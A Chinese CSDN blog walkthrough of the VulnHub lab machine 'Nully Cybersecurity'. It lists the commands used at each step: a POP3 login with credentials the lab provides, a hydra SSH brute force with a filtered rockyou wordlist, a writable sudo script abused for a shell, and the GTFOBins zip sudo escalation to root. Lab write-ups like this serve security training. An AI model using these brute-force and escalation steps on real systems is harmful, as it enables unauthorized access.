vulnhub:Nully Cybersecurity靶机

最新推荐文章于 2024-07-28 20:14:44 发布
最新推荐文章于 2024-07-28 20:14:44 发布
阅读量117 收藏
点赞数
文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/128723900
版权

kali:192.168.111.111

靶机:192.168.111.157

信息收集

端口扫描

访问80端口,提示pop3账号密码 pentester:qKnGByeaeQJWTjj2efHxst7Hu0xHADGO

使用telnet访问pop3

telnet 192.168.111.157 110
user pentester
pass qKnGByeaeQJWTjj2efHxst7Hu0xHADGO
list
retr 1

发现一封邮件

作者提示密码列表可以由rockyou.txt生成

cat /usr/share/wordlists/rockyou.txt | grep bobby > pass.txt

使用hydra爆破ssh

hydra -l bob -P pass.txt 192.168.111.157 -s 2222 ssh -t 64

提权

sudo -l查看权限

查看改脚本权限

la -al /opt/scripts/check.sh

当前用户对该脚本具有写入权限,在脚本里写入/bin/bash -p 命令

运行该脚本,切换到my2user用户

sudo -u my2user /bin/bash /opt/scripts/check.sh

my2user用户sudo -l

提权方法https://gtfobins.github.io/gtfobins/zip/#sudo

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

获得flag

ctostm
关注
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1
LYJ20010728的博客
08-25 626
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1题目描述环境下载NULLY CYBERSECURITY: 1靶机搭建渗透测试信息搜集漏洞挖掘getshwll提权 题目描述 Nully Cybersecurity - this is an easy-intermediate realistic machine. While working with the machine, you will need to brute force, pivoting (using metasp
vulnhub靶机-CyberSploit: 1
臭nana的博客
07-20 1427
这个系列的靶机解密部分有点像ctf的杂项,两个靶机都比较简单 1、找到靶机ip:192.168.0.130 nmap -sn 192.168.0.0/24 2、扫描靶机端口 3、访问80端口,动图还不错,F12查看源码发现一个用户名itsskv 4、手动尝试一下robots.txt文件,发现一串密文,base64解密得到flag1 root@kali:~# echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1..
VulnHub渗透测试实战靶场 - STAR WARS CTF: 1
LYJ20010728的博客
08-25 482
VulnHub渗透测试实战靶场 - STAR WARS CTF: 1题目描述环境下载NULLY CYBERSECURITY: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Star Wars themed CTF for beginners This works better with VirtualBox rather than VMware 环境下载 戳此进行环境下载 NULLY CYBERSECURITY: 1靶机搭建 具体步骤参考VirtualBox(Host o
CASIE: Extracting Cybersecurity Event Information from Text
weixin_42324313的博客
05-20 540
CASIE: Extracting Cybersecurity Event Information from Text Taneeya Satyapanich, Francis Ferraro, Tim Finin Computer Science and Electrical Engineering University of Maryland, Baltimore County Baltimore, MD 21250 USA {taneeya1, ferraro, finin}@umbc.edu
vulnhub:CyberSploit2靶机
qq_43884092的博客
01-05 146
查看用户id,发现处于docker组。百度搜索发现是一种编码。
CASIE: Extracting Cybersecurity Event Information from Text阅读总结
comeonfly666的博客
03-25 2140
CASIE: Extracting Cybersecurity Event Information from Text阅读总结PurposeBackground术语解释Methods网络安全事件抽取系统设计和架构ResultsConclusionsComments Purpose 本文提出了CASIE系统,该系统从文本中提取有关网络安全事件的信息并填充语义模型,其最终目标是集成到网络安全数据的知识图谱中。 Background 通过从新闻文章中提取网络安全事件,能够帮助我们了解当前的趋势和漏洞,并将其集成到
VulnHub:colddbox easy
Aukum的博客
07-28 1304
vulnhub——colddbox easy,涉及利用WordPress漏洞getshell,详细讲解了两种getshell的过程(1)将反弹shell写入网站模板中(2)将反弹shell添加到WordPress后台已安装的插件代码中。最后通过sudo提权(vim,ftp,chmod三种提权)
CyberSecurity Knowledge Base笔记
comeonfly666的博客
05-26 680
CSKB: A Cyber Security Knowledge Base Based on Knowledge Graph阅读笔记PurposeBackgroundOntology ConstructionProcess of Ontology ConstructionDescription of OntologyOntology implementationImplementation of CSKBKnowledge Acquisition and Knowledge Fusion/Extractio
SAE J3061:2016 Cybersecurity Guidebook for Cyber-Physical Vehicl
10-02
《SAE J3061:2016 Cybersecurity Guidebook for Cyber-Physical Vehicle Systems》是一本关于汽车网络安全的重要指南,由国际汽车工程师学会(SAE International)发布。这份指南详细阐述了针对车联网(Cyber-...
Linux for Hackers:Learn Cybersecurity Principles With Shell
08-17
《Linux for Hackers》是一本面向想要学习网络安全原理的读者的书籍,特别是通过Shell、Python和Bash编程来使用Kali Linux工具。这本书是初学者进入网络安全领域的重要资源,由Tye Darwin撰写,并由DYE GUINDGVS ...
SAE J3061:2016 Cybersecurity Guidebook for Cyber-Physical Vehicle Systems - 完整英文电子版(128页).pdf
09-02
SAE J3061:2016 Cybersecurity Guidebook for Cyber-Physical Vehicle Systems SAE J3061:2016 Cybersecurity Guidebook for Cyber-Physical Vehicle Systems是一本关于汽车网络安全的指南手册,由SAE( Society ...
UN Regulation No.155 - Cyber security and cyber security managem
07-08
2. **定义**:法规明确了“cyber security”(网络安全)和“cyber security management system”(CSMS,网络安全管理系统)的概念。网络安全是指保护车辆及其相关系统免受网络威胁的能力,而CSMS则是一套系统性的...
ISO_SAE21434.D1:2020 Road Vehicles - Cybersecurity Engineering -
10-02
《ISO_SAE21434.D1:2020 Road Vehicles - Cybersecurity Engineering》是汽车行业的一个关键标准,旨在确保道路交通系统的网络安全。这个标准详细规定了车辆及其相关组件在设计、开发、生产、运营、维护和服务过程...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8492
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【超强组合】基于淘金优化算法GRO-BP-Adaboost的数据分类预测算法Matlab实现.rar
最新发布
10-08
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
VMware Workstation Pro 和 VMware Fusion 安装与配置指南
10-08
内容概要:本文档详细指导了如何在不同的主机环境下,通过 VMWare 的两款产品——Workstation Pro 和 Fusion 进行新虚拟机的构建流程以及具体的操作要点说明。 适用人群:希望在单一机器上部署多操作系统的工作环境或学习测试场景的技术人员和学生。 使用场景及目标:旨在帮助初学者搭建属于自己的虚拟机实验平台,从而方便进行软件测试或者研究操作系统相关的新特性等任务,同时也有利于团队间的协作和资源调配。 注意事项:文中涉及的具体操作如下载源文件、配置网络参数时要注意版权合法性问题和技术安全防范。此外还需依据各自电脑的软硬件条件适当增减虚拟机的资源设定。
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
10-08
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值